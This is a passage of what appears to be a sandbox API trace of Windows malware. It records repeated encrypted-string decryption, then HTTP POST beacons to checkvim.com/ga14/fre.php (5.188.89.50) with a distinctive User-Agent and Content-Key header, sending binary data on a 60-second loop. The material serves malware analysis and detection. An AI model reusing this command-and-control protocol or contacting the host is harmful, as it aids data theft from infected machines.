hHeap=0x840000) returned 1 [0331.827] GetProcessHeap () returned 0x840000 [0331.827] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87fdd0 | out: hHeap=0x840000) returned 1 [0331.827] GetProcessHeap () returned 0x840000 [0331.827] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870448 | out: hHeap=0x840000) returned 1 [0331.827] GetProcessHeap () returned 0x840000 [0331.827] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x86f2d0 | out: hHeap=0x840000) returned 1 [0331.827] closesocket (s=0x5c4) returned 0 [0331.827] GetProcessHeap () returned 0x840000 [0331.827] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871c28 | out: hHeap=0x840000) returned 1 [0331.827] GetProcessHeap () returned 0x840000 [0331.827] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870228 | out: hHeap=0x840000) returned 1 [0331.827] GetProcessHeap () returned 0x840000 [0331.827] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87f8c0 | out: hHeap=0x840000) returned 1 [0331.827] GetProcessHeap () returned 0x840000 [0331.827] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8713f8 | out: hHeap=0x840000) returned 1 [0331.828] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x8825d8, dwCreationFlags=0x0, lpThreadId=0x19fbb0 | out: lpThreadId=0x19fbb0*=0x9ec) returned 0x5c4 [0331.830] Sleep (dwMilliseconds=0xea60) [0331.862] GetProcessHeap () returned 0x840000 [0331.862] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x40) returned 0x87fa28 [0331.862] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0331.863] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19f950*=0x0) returned 1 [0331.868] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0331.868] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19f950*=0x86fe80) returned 1 [0331.874] GetProcessHeap () returned 0x840000 [0331.874] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x24) returned 0x870848 [0331.874] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0331.875] CryptImportKey (in: hProv=0x86fe80, pbData=0x870848, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19f954 | out: phKey=0x19f954*=0x87e3f0) returned 1 [0331.876] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0331.876] CryptSetKeyParam (hKey=0x87e3f0, dwParam=0x4, pbData=0x19f94c*=0x1, dwFlags=0x0) returned 1 [0331.877] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0331.877] CryptSetKeyParam (hKey=0x87e3f0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0331.877] GetProcessHeap () returned 0x840000 [0331.877] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870848 | out: hHeap=0x840000) returned 1 [0331.878] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0331.878] CryptDecrypt (in: hKey=0x87e3f0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x87fa28, pdwDataLen=0x19f9a4 | out: pbData=0x87fa28, pdwDataLen=0x19f9a4) returned 1 [0331.879] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0331.879] CryptDestroyKey (hKey=0x87e3f0) returned 1 [0331.880] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0331.881] CryptReleaseContext (hProv=0x86fe80, dwFlags=0x0) returned 1 [0331.881] GetProcessHeap () returned 0x840000 [0331.881] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x212) returned 0x870228 [0331.882] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0331.882] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0331.883] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0331.883] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0331.884] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0331.884] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0331.884] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0331.885] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0331.885] GetProcessHeap () returned 0x840000 [0331.885] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x20) returned 0x871470 [0331.885] getaddrinfo (in: pNodeName="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19f960*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19f980 | out: ppResult=0x19f980*=0x0) returned 11001 [0331.885] GetProcessHeap () returned 0x840000 [0331.885] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871470 | out: hHeap=0x840000) returned 1 [0331.885] GetProcessHeap () returned 0x840000 [0331.885] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870228 | out: hHeap=0x840000) returned 1 [0331.885] GetProcessHeap () returned 0x840000 [0331.885] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87fa28 | out: hHeap=0x840000) returned 1 [0331.885] GetProcessHeap () returned 0x840000 [0331.885] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x40) returned 0x87f710 [0331.886] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0331.886] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19f950*=0x0) returned 1 [0331.891] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0331.891] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19f950*=0x86fa40) returned 1 [0331.898] GetProcessHeap () returned 0x840000 [0331.898] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x24) returned 0x870848 [0331.899] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0331.899] CryptImportKey (in: hProv=0x86fa40, pbData=0x870848, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19f954 | out: phKey=0x19f954*=0x87e830) returned 1 [0331.900] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0331.900] CryptSetKeyParam (hKey=0x87e830, dwParam=0x4, pbData=0x19f94c*=0x1, dwFlags=0x0) returned 1 [0331.901] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0331.901] CryptSetKeyParam (hKey=0x87e830, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0331.901] GetProcessHeap () returned 0x840000 [0331.901] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870848 | out: hHeap=0x840000) returned 1 [0331.902] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0331.902] CryptDecrypt (in: hKey=0x87e830, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x87f710, pdwDataLen=0x19f9a4 | out: pbData=0x87f710, pdwDataLen=0x19f9a4) returned 1 [0331.903] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0331.903] CryptDestroyKey (hKey=0x87e830) returned 1 [0331.904] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0331.904] CryptReleaseContext (hProv=0x86fa40, dwFlags=0x0) returned 1 [0331.904] GetProcessHeap () returned 0x840000 [0331.904] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x212) returned 0x870228 [0331.905] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0331.905] StrStrA (lpFirst="http://checkvim.com/ga14/fre.php", lpSrch="http://") returned="http://checkvim.com/ga14/fre.php" [0331.906] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0331.906] StrStrA (lpFirst="checkvim.com/ga14/fre.php", lpSrch="/") returned="/ga14/fre.php" [0331.907] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0331.907] StrStrA (lpFirst="checkvim.com/ga14/fre.php", lpSrch=":") returned 0x0 [0331.907] GetProcessHeap () returned 0x840000 [0331.907] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x20) returned 0x871538 [0331.907] getaddrinfo (in: pNodeName="checkvim.com", pServiceName="80", pHints=0x19f960*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19f980 | out: ppResult=0x19f980*=0x8711a0*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x878c98*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), ai_next=0x0)) returned 0 [0331.909] GetProcessHeap () returned 0x840000 [0331.909] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x4) returned 0x871b38 [0331.909] socket (af=2, type=1, protocol=6) returned 0x5c8 [0331.909] connect (s=0x5c8, name=0x878c98*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), namelen=16) returned 0 [0331.977] FreeAddrInfoW (pAddrInfo=0x8711a0*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x878c98*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), ai_next=0x0)) [0331.977] GetProcessHeap () returned 0x840000 [0331.977] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x7d) returned 0x86ff90 [0331.977] GetProcessHeap () returned 0x840000 [0331.977] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x201b) returned 0x8885d0 [0331.978] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0331.979] wvsprintfA (in: param_1=0x8885d0, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19f988 | out: param_1="POST /ga14/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: checkvim.com\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 172 [0331.979] GetProcessHeap () returned 0x840000 [0331.979] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xae) returned 0x870448 [0331.979] GetProcessHeap () returned 0x840000 [0331.979] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8885d0 | out: hHeap=0x840000) returned 1 [0331.979] GetProcessHeap () returned 0x840000 [0331.979] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3e) returned 0x87fd88 [0331.979] GetProcessHeap () returned 0x840000 [0331.980] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x1fdc) returned 0x8885d0 [0331.980] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0331.981] wvsprintfA (in: param_1=0x8885d0, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19f988 | out: param_1="POST /ga14/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: checkvim.com\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 66369A18\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 237 [0331.982] GetProcessHeap () returned 0x840000 [0331.982] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xef) returned 0x873a58 [0331.982] GetProcessHeap () returned 0x840000 [0331.982] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8885d0 | out: hHeap=0x840000) returned 1 [0331.982] send (s=0x5c8, buf=0x873a58*, len=237, flags=0) returned 237 [0331.982] send (s=0x5c8, buf=0x87eb58*, len=159, flags=0) returned 159 [0331.982] GetProcessHeap () returned 0x840000 [0331.982] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xfd0) returned 0x8825d8 [0331.982] recv (in: s=0x5c8, buf=0x8825d8, len=4048, flags=0 | out: buf=0x8825d8*) returned 237 [0332.351] GetProcessHeap () returned 0x840000 [0332.351] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x873a58 | out: hHeap=0x840000) returned 1 [0332.351] GetProcessHeap () returned 0x840000 [0332.351] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87fd88 | out: hHeap=0x840000) returned 1 [0332.351] GetProcessHeap () returned 0x840000 [0332.351] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870448 | out: hHeap=0x840000) returned 1 [0332.351] GetProcessHeap () returned 0x840000 [0332.351] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x86ff90 | out: hHeap=0x840000) returned 1 [0332.351] closesocket (s=0x5c8) returned 0 [0332.352] GetProcessHeap () returned 0x840000 [0332.352] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871b38 | out: hHeap=0x840000) returned 1 [0332.352] GetProcessHeap () returned 0x840000 [0332.352] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870228 | out: hHeap=0x840000) returned 1 [0332.352] GetProcessHeap () returned 0x840000 [0332.352] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87f710 | out: hHeap=0x840000) returned 1 [0332.352] GetProcessHeap () returned 0x840000 [0332.352] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871538 | out: hHeap=0x840000) returned 1 [0332.352] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x8825d8, dwCreationFlags=0x0, lpThreadId=0x19fbb0 | out: lpThreadId=0x19fbb0*=0xf1c) returned 0x5c8 [0332.353] Sleep (dwMilliseconds=0xea60) [0332.361] GetProcessHeap () returned 0x840000 [0332.361] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x40) returned 0x87fb90 [0332.361] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0332.362] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19f950*=0x0) returned 1 [0332.366] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0332.367] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19f950*=0x86fac8) returned 1 [0332.373] GetProcessHeap () returned 0x840000 [0332.373] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x24) returned 0x8708a8 [0332.373] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0332.374] CryptImportKey (in: hProv=0x86fac8, pbData=0x8708a8, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19f954 | out: phKey=0x19f954*=0x87e470) returned 1 [0332.374] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0332.374] CryptSetKeyParam (hKey=0x87e470, dwParam=0x4, pbData=0x19f94c*=0x1, dwFlags=0x0) returned 1 [0332.375] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0332.375] CryptSetKeyParam (hKey=0x87e470, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0332.375] GetProcessHeap () returned 0x840000 [0332.375] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8708a8 | out: hHeap=0x840000) returned 1 [0332.376] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0332.377] CryptDecrypt (in: hKey=0x87e470, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x87fb90, pdwDataLen=0x19f9a4 | out: pbData=0x87fb90, pdwDataLen=0x19f9a4) returned 1 [0332.377] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0332.378] CryptDestroyKey (hKey=0x87e470) returned 1 [0332.378] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0332.379] CryptReleaseContext (hProv=0x86fac8, dwFlags=0x0) returned 1 [0332.379] GetProcessHeap () returned 0x840000 [0332.379] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x212) returned 0x870228 [0332.380] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0332.380] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0332.381] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0332.381] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0332.384] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0332.384] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0332.385] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0332.385] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0332.385] GetProcessHeap () returned 0x840000 [0332.385] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x20) returned 0x871178 [0332.385] getaddrinfo (in: pNodeName="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19f960*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19f980 | out: ppResult=0x19f980*=0x0) returned 11001 [0332.385] GetProcessHeap () returned 0x840000 [0332.385] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871178 | out: hHeap=0x840000) returned 1 [0332.385] GetProcessHeap () returned 0x840000 [0332.385] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870228 | out: hHeap=0x840000) returned 1 [0332.385] GetProcessHeap () returned 0x840000 [0332.385] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87fb90 | out: hHeap=0x840000) returned 1 [0332.385] GetProcessHeap () returned 0x840000 [0332.385] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x40) returned 0x87f998 [0332.386] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0332.386] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19f950*=0x0) returned 1 [0332.391] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0332.392] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19f950*=0x86fa40) returned 1 [0332.397] GetProcessHeap () returned 0x840000 [0332.398] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x24) returned 0x8708a8 [0332.398] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0332.398] CryptImportKey (in: hProv=0x86fa40, pbData=0x8708a8, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19f954 | out: phKey=0x19f954*=0x87e6f0) returned 1 [0332.401] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0332.401] CryptSetKeyParam (hKey=0x87e6f0, dwParam=0x4, pbData=0x19f94c*=0x1, dwFlags=0x0) returned 1 [0332.402] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0332.402] CryptSetKeyParam (hKey=0x87e6f0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0332.402] GetProcessHeap () returned 0x840000 [0332.402] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8708a8 | out: hHeap=0x840000) returned 1 [0332.403] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0332.403] CryptDecrypt (in: hKey=0x87e6f0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x87f998, pdwDataLen=0x19f9a4 | out: pbData=0x87f998, pdwDataLen=0x19f9a4) returned 1 [0332.404] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0332.404] CryptDestroyKey (hKey=0x87e6f0) returned 1 [0332.405] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0332.405] CryptReleaseContext (hProv=0x86fa40, dwFlags=0x0) returned 1 [0332.405] GetProcessHeap () returned 0x840000 [0332.405] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x212) returned 0x870228 [0332.406] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0332.406] StrStrA (lpFirst="http://checkvim.com/ga14/fre.php", lpSrch="http://") returned="http://checkvim.com/ga14/fre.php" [0332.407] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0332.407] StrStrA (lpFirst="checkvim.com/ga14/fre.php", lpSrch="/") returned="/ga14/fre.php" [0332.408] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0332.408] StrStrA (lpFirst="checkvim.com/ga14/fre.php", lpSrch=":") returned 0x0 [0332.408] GetProcessHeap () returned 0x840000 [0332.408] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x20) returned 0x8713f8 [0332.408] getaddrinfo (in: pNodeName="checkvim.com", pServiceName="80", pHints=0x19f960*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19f980 | out: ppResult=0x19f980*=0x871498*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x878c08*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), ai_next=0x0)) returned 0 [0332.411] GetProcessHeap () returned 0x840000 [0332.411] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x4) returned 0x871b78 [0332.411] socket (af=2, type=1, protocol=6) returned 0x5cc [0332.411] connect (s=0x5cc, name=0x878c08*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), namelen=16) returned 0 [0332.477] FreeAddrInfoW (pAddrInfo=0x871498*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x878c08*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), ai_next=0x0)) [0332.477] GetProcessHeap () returned 0x840000 [0332.477] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x7d) returned 0x86fd70 [0332.477] GetProcessHeap () returned 0x840000 [0332.477] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x201b) returned 0x8885d0 [0332.478] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0332.479] wvsprintfA (in: param_1=0x8885d0, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19f988 | out: param_1="POST /ga14/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: checkvim.com\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 172 [0332.479] GetProcessHeap () returned 0x840000 [0332.479] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xae) returned 0x870448 [0332.479] GetProcessHeap () returned 0x840000 [0332.479] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8885d0 | out: hHeap=0x840000) returned 1 [0332.479] GetProcessHeap () returned 0x840000 [0332.479] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3e) returned 0x87fb00 [0332.479] GetProcessHeap () returned 0x840000 [0332.479] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x1fdc) returned 0x8885d0 [0332.480] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0332.481] wvsprintfA (in: param_1=0x8885d0, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19f988 | out: param_1="POST /ga14/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: checkvim.com\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 66369A18\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 237 [0332.481] GetProcessHeap () returned 0x840000 [0332.481] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xef) returned 0x873a58 [0332.481] GetProcessHeap () returned 0x840000 [0332.481] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8885d0 | out: hHeap=0x840000) returned 1 [0332.481] send (s=0x5cc, buf=0x873a58*, len=237, flags=0) returned 237 [0332.483] send (s=0x5cc, buf=0x87eb58*, len=159, flags=0) returned 159 [0332.483] GetProcessHeap () returned 0x840000 [0332.484] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xfd0) returned 0x8825d8 [0332.484] recv (in: s=0x5cc, buf=0x8825d8, len=4048, flags=0 | out: buf=0x8825d8*) returned 237 [0332.845] GetProcessHeap () returned 0x840000 [0332.845] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x873a58 | out: hHeap=0x840000) returned 1 [0332.845] GetProcessHeap () returned 0x840000 [0332.845] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87fb00 | out: hHeap=0x840000) returned 1 [0332.845] GetProcessHeap () returned 0x840000 [0332.845] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870448 | out: hHeap=0x840000) returned 1 [0332.846] GetProcessHeap () returned 0x840000 [0332.846] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x86fd70 | out: hHeap=0x840000) returned 1 [0332.846] closesocket (s=0x5cc) returned 0 [0332.846] GetProcessHeap () returned 0x840000 [0332.846] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871b78 | out: hHeap=0x840000) returned 1 [0332.846] GetProcessHeap () returned 0x840000 [0332.846] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870228 | out: hHeap=0x840000) returned 1 [0332.846] GetProcessHeap () returned 0x840000 [0332.846] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87f998 | out: hHeap=0x840000) returned 1 [0332.846] GetProcessHeap () returned 0x840000 [0332.846] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8713f8 | out: hHeap=0x840000) returned 1 [0332.846] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x8825d8, dwCreationFlags=0x0, lpThreadId=0x19fbb0 | out: lpThreadId=0x19fbb0*=0x10d8) returned 0x5cc [0332.848] Sleep (dwMilliseconds=0xea60) [0332.871] GetProcessHeap () returned 0x840000 [0332.871] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x40) returned 0x87f680 [0332.872] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0332.873] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, 